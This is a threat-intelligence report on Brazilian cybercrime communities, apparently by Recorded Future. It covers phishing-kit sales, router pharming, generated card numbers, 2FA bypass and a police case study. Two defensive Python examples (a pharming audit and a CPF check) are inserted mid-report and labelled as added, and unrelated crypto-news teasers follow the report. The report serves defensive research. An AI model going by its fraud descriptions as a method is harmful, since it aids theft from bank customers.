
Pirates of Brazil: Integrating the Strengths of Russian and Chinese Hacking Communities

Insikt Group


Recorded Future’s Insikt Group analyzed advertisements, posts, and interactions within hacking and criminal forums to explore the capabilities, culture, and organization of Brazilian hacking communities. Sources include the Recorded Future® Platform as well as open web, dark web, and underground forum research.

This report, which is part of a series that started with Russia and China, Japan, and Iran, will be of greatest interest to organizations seeking to understand the criminal underground to better monitor financial vertical and company-specific threats, as well as to those investigating the Brazilian criminal underground.

Executive Summary

Each country’s hackers are unique, with their own codes of conduct, forums, motives and payment methods. Recorded Future’s Portuguese-speaking analysts, with a long-standing background in the Brazilian underground, have analyzed underground markets and forums tailored to the Brazilian Portuguese audience over the past decade and discovered a number of particularities in content hosted on forums, as well as differences in forum organization and conduct.

The primary target of Brazilian hackers is Brazilians. Hackers in Brazil range from entry-level hackers and security researchers who disclose vulnerabilities at private conferences to black hat hackers who sell illicit products and services. Brazilian hackers are always in search of the next opportunity for easy money. When companies react to their activity by increasing security controls, they move on to another business. The abilities of high-level hackers are illustrated by Brazilian law enforcement efforts like Operation Ostentation and by the ATM malware of the Prilex gang.

Brazilian forums are not necessarily based on web forums. The Chinese underground is more similar to Brazil’s than Russia’s in that way, but Chinese cybercriminals rely on local apps such as QQ and WeChat. The Brazilian forum platform of choice was — and still is — dynamic, changing based on broader social trends and law enforcement efforts. At this time, the forums of choice are WhatsApp and Telegram. Access to Brazilian forums is not as strict as in the Russian-speaking underground. However, because the Brazilian underground is scattered among Telegram and WhatsApp groups, the collection sources are varied. Information in Brazilian forums is not as well organized as in Russian-speaking forums, where threads for products or services are fixed, with well-structured posts listing features and pricing.

Key Judgments

  • Carding is strong in the country. There is significant activity involving credit card numbers generated by algorithms — “geradas” in the local slang. This was not observed by Insikt Group in the other geographies covered by this series, at least not explicitly.
  • Spam, delivered through email, SMS, social media, and messengers, is still one of the primary methods of malware and phishing distribution. Local actors take advantage of the less strict security mechanisms in SMS to distribute URLs or malware samples.
  • Mass pharming attacks involving vulnerable customer-premises equipment (CPE), observed for the first time in 2014, are still an important method of credential collection. Typical targets are financial institutions, streaming services, and web hosting companies.
  • Brazilian cybercriminals are not intimidated by two-factor authentication (2FA). While the majority of entry-level hackers move to another activity, high-level hackers insist — and succeed — in bypassing this security control. Techniques observed by Insikt Group include SIM-swap attacks, full compromise of desktops used for internet banking, and hackers’ direct interaction and interference with banking sessions.


Brazilian Communities: Pirate Spirit

Similar to Russian-speaking cybercriminals, Brazilian cybercriminals hold one thing above all else: money. Hacker communities in Brazil differ in their neighborhoods, motivations, goals, and communication platform of choice.

Figure: Telegram references on timeline. Telegram, a very relevant source for Brazil, was recently added to Recorded Future.

Whereas we used “thieves” and “geeks” to define Russian and Chinese undergrounds, respectively, we describe Brazilian hackers as “pirates” because they are not just specialized thieves like the Russian-speaking actors, but are ready to change their TTPs and forum platforms at any time, depending on where the easy money is and what law enforcement and security researchers are doing to collect information on them. At the same time, a very select group of Brazilian cybercriminals resemble their Chinese counterparts, in that they can bypass strict internet banking security controls and ATM security in an impressive way.

History of the Brazilian Underground

Commercial internet was introduced in Brazil between 1995 and 1996. In the late ’90s, Internet Relay Chat (IRC) networks and ICQ messenger — as well as bulletin board systems (BBS), web-based forums, and chats — became the main chat platforms in Brazil.

IRC channels were the forums of choice for professional hackers in the 2000s and early 2010s. Activity included advertisements of products and services, bulk credit card information, and discussions — none of it organized by topic. For example, IRC servers operated by the groups Silver Lords and FullNetwork — better described as an IRC network than as a group — ruled the underground for years.

“mIRC” — the name of a very popular IRC client that became synonymous with the Brazilian term for an IRC client — became very popular among all types of users. Brasirc and Brasnet were the most popular IRC networks, and from their channels emerged some of the first-known threat activity in Brazil: intentional IRC flooding attacks (a kind of denial-of-service attack) against the IRC server host, takeovers of usernames, and coordinated attacks.

The IRC protocol was a favorable environment for hacking discussions, with features including controlled access to channels and servers, the ability to grant specific privileges to each user, and bots. At first, hackers met in public IRC networks like Brasirc and Brasnet, but over time they began hosting their own IRC servers. Those servers were harder to find, which gave users and administrators a certain degree of privacy. Just like in the special-access web forums found in Russian-speaking countries, there was access control: a registered “nick” (nickname) was required to join channels on certain servers, and the bot (service) that managed the nicks (NickServ) was not available at all times.

A common area of interest among Brazilian hackers across many groups, skill levels, and motives is penetration testing. This is one of the main topics of most local hacker conferences and entry-level web forums, where tools and tutorials are shared.

In Brazil, website defacement was always one of the main types of hacking activities. Brazilians always were — and still are — one of the top reporters of website defacements to the popular defacement archive zone-h[.]org.

Figure: Zone-H archive. ProtoWave Reloaded group’s verified submissions to Zone-H, a notorious web defacement archive. To date, this Brazilian group has defaced more than 1,250 webpages.

Historically, most Brazilians involved with website defacement were teenagers learning how to exploit software vulnerabilities and badly configured internet-facing systems. Defacement was considered a learning experience in the absence of security frameworks — from reconnaissance to penetration testing and vulnerability exploitation.

From 2005 to the present day, there is still a significant website defacement community in the Brazilian underground, and the motive has evolved from warning administrators to hacktivism. In Brazil, the theme of defacements also corresponds to the current headlines in newspapers: natural disasters, political scandals, and so on.

Some of the most notorious hacker groups of the early 2000s emerged during the IRC era:

  • Website Defacement: Prime Suspectz1, Silver Lords, Insanity Zine, HFury, DataCha0s, Crime Boys
  • Hacking: Unsekurity Scene, or just “unsek,” and its “spin off” groups Clube dos Mercenários (CDM), Front The Scene (FTS)

In the context of hacking, the activity was mainly security research on reconnaissance, penetration testing, and known vulnerability exploitation. Given the limitations of that time — no vast penetration testing literature, frameworks like Metasploit, or tools like Kali Linux — it is possible that some of those researchers began as web defacement actors.

In a series of articles published in 2001, investigative journalist Giordani Rodrigues interviewed the main web defacement groups of that time. In most of them, actors were between 15 and 22 years old. Most likely, that age range has not changed significantly. Actors in that age range tend to act irresponsibly — maturity and ethics are what separate a web defacer who becomes a security professional from one who moves to other outcomes of an intrusion, like data exfiltration or lateral movement.

In 2010, when Anonymous activity began worldwide, the same activity was observed in Brazil. It began as support for WikiLeaks in the second half of 2010 and continues in various forms to the present day. The highest level of Anonymous activity occurred between 2011 and 2015, when most global operations had support from local groups. Targets were mostly political, and distributed denial of service (DDoS) was the primary type of attack. In 2011, Brazilian Federal Police probed the activity of Anonymous in Brazil, as multiple government websites were targets.

Since 2016, groups that claim to support Anonymous’s cause have targets that vary with the headlines of local news and public opinion. Corrupt politicians, companies involved in corruption scandals, candidates in elections, the 2016 Summer Olympics in Rio de Janeiro, the 2014 FIFA World Cup in Brazil — any target or topic is eligible for a local Anonymous campaign. After DDoS attacks became ineffective, the most typical attack became — and still is — the leak of breach data. In the past year, Anonymous activity primarily focused on political targets. In the last incident, AnonOpsBR, one of the only groups with recent and recurrent activity, attacked the Brazilian Ministry of Defense and now president-elect Jair Bolsonaro, as well as the vice president.

Organization of the Brazilian Underground

In Brazil, any platform used for interaction could be considered a hacker forum. As we stated before, the typical organization of Russian-speaking criminal underground communities does not apply to what we observe in Brazil: no forum has a single purpose, and none is well organized, lacking fixed threads for products or services and well-structured posts with features and pricing. This makes a big difference in terms of understanding the local underground.

Unlike in Russian-speaking countries, Jabber/XMPP was never a popular chat platform for Brazilian hacker forums. We can state with a high level of confidence that communities of interest jumped from IRC to the modern mobile chat platforms, such as Telegram, WhatsApp, TeamSpeak (gaming), and Discord (gaming), beginning in 2015. Privacy-oriented messengers like Wickr and Signal are more frequently seen in Tor dark web forums and markets.

Orkut, by Google, was the first popular social network in Brazil. From 2004 to 2010, it was the center of the internet — along with the hacking scene — for Brazilians. Private Orkut groups were created for selling hacking products and services. The organization of advertisements was very similar to what we see in Russian-speaking web forums. Around 2010, users started to migrate to Facebook, including the hackers. In 2014, Orkut was discontinued by Google.

The use of social networks for cybercrime shows how unprofessional certain groups of Brazilian hackers are. Any actor from Russian-speaking or Chinese-speaking forums would know that social networks are a risky place to conduct illicit business. The companies that own those networks are generally obliged to cooperate with local authorities, making it easier for law enforcement to investigate and detain hackers.

In Brazil, cybercrime actors started to use Facebook for advertisement as soon as the social network became popular in the country in 2011. Groups were closed, but there was no strict review or vetting process — it was just a matter of requesting access and having it granted.

In 2011, Kaspersky Lab found a website created for hackers to check if another hacker they were doing business with was reliable or a “ripper” (scammer). The service was dubbed “SPC dos Hackers,” which essentially means “Hacker’s Credit Report,” and it was a database of usernames, the contact information associated with each of those usernames, and assessments of those users — positive or negative.

On average, Brazilian cybercriminals from entry to medium level do not demonstrate concerns about operational security (OPSEC) and law enforcement. It is common in the country to see criminals detained for cybercrime only to be released days or weeks later.

Current Landscape

Brazilian web forums do not have a significant role in the Brazilian underground. They never did, and most likely never will. In 2010, the most prominent hacker web forums were essentially the same as the most active ones in 2019: Fórum Hacker and Guia do Hacker. Some forums emerged and were voluntarily taken down in the meantime, like Perfect Hackers, which was taken down in 2018. However, those prominent forums remain the main hacker communities, and they are open to the public. There is no vetting process for registration and no paid registration. Anyone can join those forums.

Brazilian web forums are an environment for learning how to become a hacker and the sharing of information and tools. In Brazil, forums have been home to entry-level hackers (script kiddies) since at least 2010. They stay in the forums while it is useful for them to learn hacking methodologies. Camaraderie is praised and encouraged. There are products and services for sale. Mobile forums — specifically, Telegram channels — became the preferred environment to advertise products and services.

More recently, as groups moved to Telegram, it was observed that most of the channels have minimal access control — a defined username is the necessary and sufficient condition to gain access to some channels. Public Brazilian Telegram channels are available on the platform.

Figure: Telegram channel advertisements. Telegram channel with advertisements for phishing kits.

In the screenshot above, the administrator of a Telegram group advertises “telas fake” — a local slang for phishing kits. In this particular case, there are three different types of product: capturing the bank account credentials for 250 BRL (66 USD), capturing basic credit card information for 200 BRL (53 USD) and capturing full credit card information (including name and address) for 150 BRL (40 USD). Cell phone icons indicate the kit is compatible with mobile phones.

Web forums like Forum Hacker and Guia do Hacker are considered by many Brazilians a good way to get immersed in network and information security. The majority of entry-level hackers are not able to enter the white hat and black hat communities in Brazil. This is best shown by the insular, invite-only nature of Brazilian hacker conferences.

Sacicon is another one-day, invite-only conference that has taken place in Sao Paulo since 2012. This conference is similar to YSTS, with a focus on highly technical talks and partying. This conference is promoted by the same organizers of the Hackers to Hackers Conference (H2HC), the first (starting in 2004) and most notorious hacker conference in Brazil. The organizers of Roadsec, a conference targeted at the entry-level security professional or student more than any other audience, also support Sacicon.

You Shot The Sheriff (YSTS), a yearly one-day invite-only hacker conference that has taken place in Sao Paulo since 2007, is similar to DEF CON in terms of content and parallel activities, like lockpicking and hardware hacking. The conference venue is always a bar. Tickets for this conference are rarely sold, but when it happens, the prices are not affordable to most local entry-level professionals or students. This is considered one of the best hacker conferences in Brazil from a security research perspective.

AlligatorCon, which takes place in Recife, PE, Brazil, is an invite-only black hat conference. This conference is similar to Sacicon in its goal to present content with a high technical level, but it goes beyond — topics include vulnerability exploitation, new hacking tools, and zero-day vulnerability disclosures. Unlike Sacicon, this conference focuses exclusively on local research, presented in Brazilian Portuguese.

We have mentioned multiple times where Brazilian hackers are not: in web forums. But where are they? The same places the rest of the Brazilians are. The communication platforms of choice are usually the very same ones used by the local population in general. In the current context, this means WhatsApp, Telegram, and Discord. The last of those is also commonly used by gamers, a result of the dominant teenage demographic in the Brazilian hacking community.

Content in Brazilian Underground Forums


The most common type of software product found in Brazilian web forums is the “crypter,” an obfuscation tool used to pack malicious software in such a way that it goes undetected by antivirus engines. The more “FUD,” or “fully undetectable,” a malware is, the more likely that malware is to reach the user’s email inbox undetected.

This high interest in malware packers is an indicator of one of the main attack vectors of Brazilian cybercriminals: email. Email spam has always been one of the main methods of phishing and malware distribution in Brazil. However, over the years, multiple security controls have increasingly prevented campaigns from reaching victims’ inboxes. Concurrently, new generations changed their relationship with email messaging, and multiple other social media sites and messenger apps emerged and became the primary communication platforms. Cybercriminals had to adapt to those behavioral changes in order to succeed.

The latest quarterly report from the Anti-Phishing Working Group (APWG) shows that phishing campaigns now use paid advertisements in search engines like Google and Bing, social media, rogue mobile apps in official stores, and smishing (SMS phishing) to target victims. Many of these channels have ineffective methods for handling spam — SMS in particular — allowing cybercriminals to reach more victims. Even after the malicious link reaches a victim’s inbox, one last phase is needed for a successful phishing campaign: the victim must take the bait and click the link. There is, however, a technique that does not merely entice users toward a fraudulent site but technically forces them there. That method is known as “pharming.”

Pharming involves the use of malware or technical strategy to subvert the DNS name resolution and force all users of a host or network to visit a known website address at the wrong host (IP address), under the control of the attacker. Pharming is a very common activity of Brazilian hackers. Despite efforts from security companies and internet service providers, occasional attacks are not always detected.

One of the first forms of pharming was local: the attacker would leverage malware to modify the local host address resolution files (“LMHOSTS” for Windows, and “hosts” for Linux). The operating system checks those files for hostname and IP address pairs before anything else, so if a bank’s hostname is listed there, that entry takes the highest priority. The user visits the correct URL but lands on the wrong server. Local pharming has one weakness: antivirus. Malware can be detected by signature or heuristics, and any application trying to modify the local name resolution file is considered suspicious. Local pharming is convincing because the URL looks legitimate to the victim, but with today’s anti-malware controls, an attacker successfully changing the file with malware is unlikely. DNS or network pharming, on the other hand, does not require the complexity of malware.

Network pharming is an attack vector used by Brazilian cybercriminals since as far back as 2014. At first, the strategy was to abuse customer-premises equipment (CPE) — network routers provided by ISPs. Most users receive the same models or routers from the ISP, making the network environment very predictable. The attack involved sending spam with local network URLs that changed the DNS settings of the local router. Succeeding with this attack method required one favorable condition: a default administrator username and password.

Over time, other strategies were used for exploiting CPEs — exploitation of remote software vulnerabilities, for instance. One of those campaigns, described by Radware in March 2018, involved the exploitation of vulnerabilities in MikroTik routers. In September 2018, 360 Netlab reported two incidents (September 4 and September 29) involving more than 85,000 routers in Brazil. Targeted domains included all major local banks, web hosting companies, and Netflix — a credential commonly offered for sale in Telegram channels. Spotify was not among the targeted domain names in those attacks but is a typical target as well. Neither service offers two-factor authentication, which makes credential collection and reuse trivial in this context.
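Both pharming vectors described above can be audited from the defender’s side. The following is an added example, not code from the report or from Recorded Future: it parses hosts-file content for entries that pin a monitored financial hostname to any address (local pharming) and checks the DNS resolvers a CPE hands out against an allowlist (network pharming). The monitored domains, resolver ranges, and the sample hosts file are constructed placeholders.

```python
"""Defender-side audit for the two pharming vectors described in the report.

Local pharming: a hosts-file entry that pins a sensitive hostname to an
attacker's address. Network pharming: a CPE/router that hands clients a DNS
resolver outside the ISP's expected set. All hostnames, addresses and the
sample hosts file below are constructed placeholders (RFC 5737 test ranges).
"""
import ipaddress
from dataclasses import dataclass

# Hypothetical: domains that should never appear in a hosts file at all.
MONITORED_SUFFIXES = ("bank.example", "streaming.example")

# Hypothetical allowlist of resolvers a CPE is expected to advertise.
ALLOWED_RESOLVERS = [
    ipaddress.ip_network("198.51.100.0/24"),  # the ISP's resolver range
    ipaddress.ip_network("1.1.1.1/32"),
    ipaddress.ip_network("8.8.8.8/32"),
]


@dataclass(frozen=True)
class Finding:
    vector: str   # "local-pharming" or "network-pharming"
    detail: str


def parse_hosts(text):
    """Return (ip, hostname) pairs from hosts-file text.

    Comments, blank lines and lines whose first field is not an IP address
    are skipped; hostnames are lower-cased and a trailing dot is dropped so
    that comparisons are case- and FQDN-insensitive.
    """
    pairs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # malformed line, not a resolution entry
        for name in fields[1:]:
            pairs.append((str(ip), name.lower().rstrip(".")))
    return pairs


def is_monitored(hostname):
    """True if hostname is one of the monitored domains or a subdomain of one."""
    return any(hostname == s or hostname.endswith("." + s) for s in MONITORED_SUFFIXES)


def audit_hosts(text):
    """Flag any hosts entry for a monitored hostname.

    A legitimate hosts file has no reason to contain a bank's hostname, so
    every match is a finding whatever address it points to (a loopback entry
    would black-hole the site rather than redirect it).
    """
    return [
        Finding("local-pharming", f"{name} pinned to {ip}")
        for ip, name in parse_hosts(text)
        if is_monitored(name)
    ]


def audit_resolvers(resolvers):
    """Flag resolver addresses (e.g. from the CPE's DNS settings) outside the allowlist."""
    findings = []
    for r in resolvers:
        addr = ipaddress.ip_address(r)
        if not any(addr in net for net in ALLOWED_RESOLVERS):
            findings.append(Finding("network-pharming", f"resolver {r} not in allowlist"))
    return findings


# Constructed sample input: a hosts file with two overrides mixed into normal
# entries, and a CPE handing out one resolver outside the allowlist.
SAMPLE_HOSTS = """\
127.0.0.1   localhost
::1         localhost
# overrides of the kind the report describes (constructed)
203.0.113.10  www.bank.example  bank.example
192.0.2.44    login.streaming.example   # looks like a CDN shortcut
10.0.0.5      intranet.corp.example
"""
SAMPLE_CPE_DNS = ["198.51.100.53", "203.0.113.7"]


def run_audit(hosts_text=SAMPLE_HOSTS, resolvers=SAMPLE_CPE_DNS):
    """Run both audits and return the combined list of findings."""
    return audit_hosts(hosts_text) + audit_resolvers(resolvers)


if __name__ == "__main__":
    for f in run_audit():
        print(f"[{f.vector}] {f.detail}")
```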

Financial Services Targeting Drives High Security Standards

The Brazilian financial system is very advanced in terms of security controls. This is a result of decades of cybercrime, real-world crime, and — no less important — a response to Brazilians’ consistent malicious activity. Brazil is a hostile environment for the financial vertical in every aspect, and as a result, security standards are high. Hacker activity and developments in the security of the financial system are strongly related, causing financial institutions to constantly increase security.

2FA for logins, 2FA for transactions via QR codes, physical tokens, browser plugins that resemble “rootkits,” pre-registration of devices, device fingerprinting, strict limits for wire transfers, pre-registration of wire transfer destination accounts, a dedicated desktop browser for internet banking, and biometry in ATMs are among the vast and ever-growing list of security controls.

Transferring money between Brazilian bank accounts and foreign banks — even within Latin America or the MERCOSUR trade bloc — is not trivial. The processing of international payment orders is treated as a currency exchange transaction. As such, additional controls against money laundering and tax evasion are applied, making moving money across country borders harder.

Another important security control relates to credit cards. In most countries, it is necessary to provide basic personal information in card-not-present (CNP) transactions: full name and full address. In Brazil, it is also necessary to provide the Cadastro de Pessoas Físicas (CPF) — a unique tax ID assigned to every Brazilian citizen — in every transaction, and that ID must match the one associated with the credit card. The CPF is very similar to a Social Security number (SSN) in the United States, and its exposure is considered critical.
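The CPF matching control can be implemented on the merchant side. The following is an added example, not code from the report or from any Brazilian payment processor: it normalizes a submitted CPF, validates its two mod-11 check digits, compares it in constant time with the CPF registered to the card, and masks it for logging, since the report treats exposure of a CPF as critical. The function names and sample CPFs are constructed; 111.444.777-35 is a widely used syntactically valid test value.

```python
"""Merchant-side CPF check for a card-not-present (CNP) transaction.

Added example. Validates the two public mod-11 check digits of a CPF,
compares it with the CPF registered to the card without leaking timing
information, and masks it for logs. Function names and sample CPFs are
constructed; 111.444.777-35 is a commonly used syntactically valid example.
"""
import hmac
import re


def normalize_cpf(value):
    """Strip the conventional 000.000.000-00 punctuation; return 11 digits or None."""
    digits = re.sub(r"\D", "", value or "")
    return digits if len(digits) == 11 else None


def _check_digit(digits):
    """Mod-11 check digit: weight the digits from len(digits)+1 down to 2."""
    total = sum(int(d) * w for d, w in zip(digits, range(len(digits) + 1, 1, -1)))
    rem = total % 11
    return "0" if rem < 2 else str(11 - rem)


def is_valid_cpf(value):
    """True if the CPF has 11 digits and both check digits are correct.

    Sequences of one repeated digit (000.000.000-00, 111.111.111-11, ...)
    satisfy the arithmetic but are not issued, so they are rejected explicitly.
    """
    cpf = normalize_cpf(value)
    if cpf is None or len(set(cpf)) == 1:
        return False
    d1 = _check_digit(cpf[:9])
    d2 = _check_digit(cpf[:9] + d1)
    return cpf[9:] == d1 + d2


def mask_cpf(value):
    """Render a CPF for logs showing only the last five digits: ***.***.777-35."""
    cpf = normalize_cpf(value)
    if cpf is None:
        return "***.***.***-**"
    return f"***.***.{cpf[6:9]}-{cpf[9:]}"


def cpf_matches_card(submitted, registered):
    """Authorization-time check: the submitted CPF is well-formed, passes the
    check digits and equals the CPF on file for the card. hmac.compare_digest
    avoids a timing side channel on the comparison."""
    sub, reg = normalize_cpf(submitted), normalize_cpf(registered)
    if sub is None or reg is None or not is_valid_cpf(sub):
        return False
    return hmac.compare_digest(sub, reg)


if __name__ == "__main__":
    # Constructed transaction: CPF on file for the card vs. CPF typed at checkout.
    on_file = "11144477735"
    for typed in ("111.444.777-35", "111.444.777-36", "111.111.111-11"):
        print(mask_cpf(typed), "->", cpf_matches_card(typed, on_file))
```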

As illustrated above, it’s difficult to move money across country borders and security controls are strict. So how can a cybercriminal thrive in such an environment?

Chip-and-PIN technology was deployed in Brazil in the early 2000s. Just like with any new technology, chip-and-PIN was abused in Brazil, and eventually, cybercriminals succeeded in attacking not the EMV system itself, but poorly implemented deployments.

In March 2018, Kaspersky Lab Brazil released research on malware targeting POS systems with chip-and-PIN (EMV): Prilex. The exploitation of EMV was not something new: other attacks against vulnerable deployments of chip-and-PIN authentication had been seen in the wild over the past few years. The group behind Prilex, which has been active since at least 2015, used many variations of a black box attack, including one involving a Raspberry Pi with 4G data network access capable of exfiltrating data. They also focused on taking control of machine infrastructure. Finally, they added point-of-sale (POS) systems to their attack surface and started targeting chip-and-PIN cards.

Prilex allegedly operates outside web-based forums and social media. According to Kaspersky researchers, they operate their own private WhatsApp groups, which are strictly controlled. For that reason, there is no forum activity from Prilex actors on the platform.

Language and Fraud Drive Targets

The primary target of Brazilian hackers is Brazilians. The Portuguese language is key for explaining that observation, but there are other elements that explain this geographical isolation.

There are other Portuguese-speaking countries — Angola, Cape Verde, Guinea-Bissau, Mozambique, Portugal, and Sao Tome and Principe — but there is minimal interaction between these countries and Brazil. The country has its own variation of Portuguese — Brazilian Portuguese — with phonetics and vocabulary that differ from the Portuguese spoken in other countries. That unique Portuguese variation, combined with cultural and economic differences, also isolates Brazil from the rest of South America, as it is surrounded by Spanish-speaking countries.

Most of the products and services in the Brazilian underground are related to personal information: access to credit record databases, full information on a given individual looked up by CPF (tax ID), and credentials. Those credentials are obtained in many ways: malware, phishing for financial credentials, phishing for credit checks, Serasa Experian credentials, and insider employees at companies of interest.

Carding, and the products and services surrounding it, like selling credentials, is one of the main activities of closed hacker groups. In the past, information was shared in IRC channels, but now it is present in Telegram and other modern platforms. Carding activity is usually not present in major hacker web forums.

Carding is strong in the country’s underground. Not all credit cards found in the Brazilian underground were necessarily collected from victims. There is strong activity involving credit card numbers generated by algorithms, referred to as “geradas.” Carders look for companies that don’t validate cards appropriately, which they call “cardeáveis,” or “susceptible to carding,” and exploit them.

In November 2016, Tesco Bank announced a security incident involving 20,000 accounts and a loss of 2.26 million GBP (2.95 million USD). The company issued a new statement a few days later, stating that normal service had resumed. No further information was disclosed in that new statement. In October 2018, the Financial Conduct Authority (FCA) released a “Final Notice” on the 2016 incident. According to the 27-page document, the attackers most likely used an algorithm that generated authentic Tesco Bank debit card numbers. It was determined that the majority of fraudulent transactions were coming from Brazil using a payment method known as “PoS 91,” an industry code indicating that the attackers were making contactless MSD transactions. Most likely, this is the most notorious example of the impact of Brazilian hacker activity involving generated card numbers.

Currently, there are no personal data protection regulations in place in Brazil. There are plans to implement one — similar to the European Union’s General Data Protection Regulation (GDPR) — but it will not be effective until December 2020. This is bill number 13.709, also known as “Lei Geral de Proteção de Dados,” or LGPD.

At this time, a company that suffers a breach is not obliged to disclose it to the public or the Brazilian government. As a result, companies deny breaches at all costs. In October 2018, Brazilian payment-processing company Stone announced a data breach on the eve of its IPO. It was reported that there was an extortion attempt, though that detail was not confirmed by the company. It could have been cybercriminals or just the competition trying to interfere with the company’s IPO. The same kind of extortion attempt before an IPO happened in April 2018 against financial-tech bank Banco Inter.

Case Study: Law Enforcement Operation Ostentation

One recent Brazilian law enforcement operation, Operation Ostentation, summarizes how a successful cybercrime enterprise in Brazil was carried out. The leader of the gang involved, Pablo Henrique Borges, was arrested on October 11, 2018. According to law enforcement reports and media, he and his gang were able to steal 400 million BRL (about 108 million USD) in 18 months. Borges was 24 years old and was living a life of luxury, with multiple Lamborghinis and Ferraris and expensive trips and habits. Two accomplices were also arrested — Rafael Antonio dos Santos and Matheus Araújo Galvão.

Figure: Cars seized in Operation Ostentation (Operação Ostentação) in October 2018.

The gang would offer to pay people’s bills with up to a 50 percent “discount” via WhatsApp or Facebook posts. This is a common money laundering technique used by Brazilian cybercriminals — instead of cashing out money from bank accounts, they paid for bills, receiving a portion of it in an unconnected account.

It is still unclear how the gang gained access to the bank accounts — more than 23,000 in total — in order to pay for the bills. Most likely, it was with a combination of malware and phishing campaigns. The person responsible for software development was 24-year-old Leandro Xavier Magalhães Fernandes. Also from humble origins — he had a high school degree but no formal education beyond that — he was responsible for the most important element of the gang’s business. His ostentatious lifestyle, with a mansion and expensive cars, attracted attention from the local law enforcement of Goiania, GO.

Unfortunately, no information on handles, the malware family, sample information, or the forum name was released about this gang. Given the background and profile of the two leaders, it is unlikely that they obtained foreign malware for this operation and likely that they developed their own malware.

We do not have further information on this particular law enforcement operation to make statements on the quality of malware that was involved. What we know from other operations and law enforcement opinion is that Brazilian cybercriminals organize themselves in a structure that resembles terrorist groups, not criminal organizations. Gangs are organized into cells — software development, operations, money laundering — in a way that the disruption of one or more cells does not affect the business. Operators are notified when an infected user opens a session and interacts with them to bypass 2FA and other security controls. In March 2016, Kaspersky described this particular type of Remote Access Trojan (RAT) that is common in Brazil.

In Brazil, there are very distinct types of hacker groups: “Lammers” (entry-level hackers, in the local slang of web forums) and legitimate researchers and hackers. Sometimes hackers evolve out of web forums; other times they appear to be completely disconnected from both of these circles. They are simply smart people with basic software development skills who found a niche to explore and a way to make money.


High-level Brazilian hackers will continue to exploit financial institutions, no matter how rigorous the security controls become. Desktop security is already high, but local cybercriminals have proven that they are capable of bypassing those controls; high desktop security therefore does not mean cybercrime is deterred.

The majority of Brazilians no longer do their internet banking on desktops, but on mobile clients. Transfers, one-time passwords, payments — all major banks allow clients to do practically anything using a mobile app. This change in behavior has already motivated change in cybercrime activity. SMS phishing (Smishing), mobile phishing kits, and malicious mobile applications — the majority for Android — pretending to be popular apps, such as WhatsApp, or mobile banking apps have increased in the past few years.

Android exploitation is already a reality in Brazil and this trend continues, as security hardening for those devices is a challenge. Another very important aspect to consider is that many Brazilians — particularly the ones with low income — don’t do internet banking on desktops simply because they don’t even own a desktop or laptop.

Use of WhatsApp in the country remains stable. Most likely, this will continue to be one of the attack vectors for cybercriminals. In 2018, WhatsApp announced and deployed person-to-person payments in India in a feature called WhatsApp Payments. According to WABetaInfo, a news website specializing in WhatsApp news, the feature will be extended to Brazil, Mexico, and the U.K. in the near future. It is highly likely that this feature will be exploited in Brazil.

1. Defacements authored by Prime Suspectz archived in Zone-H.

The post Pirates of Brazil: Integrating the Strengths of Russian and Chinese Hacking Communities appeared first on Recorded Future.


Against the Grain: Bitcoin Cash Rises after Binance Delists Bitcoin SV

Bitcoin cash (BCH) advanced on Tuesday, extending a sharp early-week rally that seems to have been triggered by a broad delisting campaign of bitcoin SV (BSV), the […]

The post Against the Grain: Bitcoin Cash Rises after Binance Delists Bitcoin SV appeared first on Hacked: Hacking Finance.

Gold is Losing In Value but Investors Don’t Need Safe Have Assets Right Now

By Dmitriy Gurkovskiy, Chief Analyst at RoboMarkets In the middle of April, gold prices continue falling. The precious metal is currently trading at $1,290.20 per ounce, while […]

The post Gold is Losing In Value but Investors Don’t Need Safe Have Assets Right Now appeared first on Hacked: Hacking Finance.

Litecoin Rallies as Network Hash Rate Approaches All-Time High; More Gains Expected?

Litecoin’s bullish indicators were flashing green on Monday, as the rapid increase in network hash rate signaled growing adoption of the alternative cryptocurrency and paved the way […]

The post Litecoin Rallies as Network Hash Rate Approaches All-Time High; More Gains Expected? appeared first on Hacked: Hacking Finance.

Tezos (XTZ) Re-Tests Yearly Highs as Baking Business Heats Up

Tezos (XTZ), the multi-purpose platform for decentralized applications and smart contracts, climbed double-digits on Sunday to test yearly highs for the second time in two weeks. XTZ […]

The post Tezos (XTZ) Re-Tests Yearly Highs as Baking Business Heats Up appeared first on Hacked: Hacking Finance.

Forget U.S. Stocks; Start Adding Chinese Companies to Your Portfolio

Chinese equities are storming ahead, demonstrating handsome and lucrative returns for investors this year. It may come as somewhat of a surprise for many, given the slowdown […]

The post Forget U.S. Stocks; Start Adding Chinese Companies to Your Portfolio appeared first on Hacked: Hacking Finance.

Crypto Update: Key Support Levels in Focus as Bulls Fight for Control

The cryptocurrency segment settled down following yesterday’s steep and broad drop, with the top coins finding support several times near the long-term levels that stopped the plunge […]

The post Crypto Update: Key Support Levels in Focus as Bulls Fight for Control appeared first on Hacked: Hacking Finance.

Crypto Market Correction Provides Buy-on-the-Dip Opportunity

Cryptocurrency prices corrected sharply lower on Thursday, snapping a multi-week accumulation phase that pushed the overall market to five-month highs. With bitcoin (BTC) and the major altcoins […]

The post Crypto Market Correction Provides Buy-on-the-Dip Opportunity appeared first on Hacked: Hacking Finance.

Crypto Update: Coins Settle Down After Monday Pullback as EOS Shines

The bullish short-term consolidation continues in the cryptocurrency segment, and following Monday’s pullback, volatility declined even further, with the majors settling down in narrow ranges. While the […]

The post Crypto Update: Coins Settle Down After Monday Pullback as EOS Shines appeared first on Hacked: Hacking Finance.

Bitcoin Eyes Another Major Milestone as Technical, Fundamental Forces Unite

Following months of accumulation, the bitcoin (BTC) price may be entering a prolonged bullish phase that mirrors the multi-year rally that began in October 2015 and peaked […]

The post Bitcoin Eyes Another Major Milestone as Technical, Fundamental Forces Unite appeared first on Hacked: Hacking Finance.

EOS Price Analysis: EOS Leads Altcoin Resurgence after Coinbase Listing Announcement

EOS led the cryptocurrency market higher on Wednesday and was poised to overtake bitcoin cash (BCH) in the market cap rankings after Coinbase announced it would extend […]

The post EOS Price Analysis: EOS Leads Altcoin Resurgence after Coinbase Listing Announcement appeared first on Hacked: Hacking Finance.

Boost Your Portfolio with These Oil ETFs Now

Crude oil prices are up a whopping 42% from the start of the year. They have pushed up to their highest levels seen since the very beginning […]

The post Boost Your Portfolio with These Oil ETFs Now appeared first on Hacked: Hacking Finance.

If Just 5% of Cryptocurrency Trade Volume is Real, What Does That Mean for Altcoins?

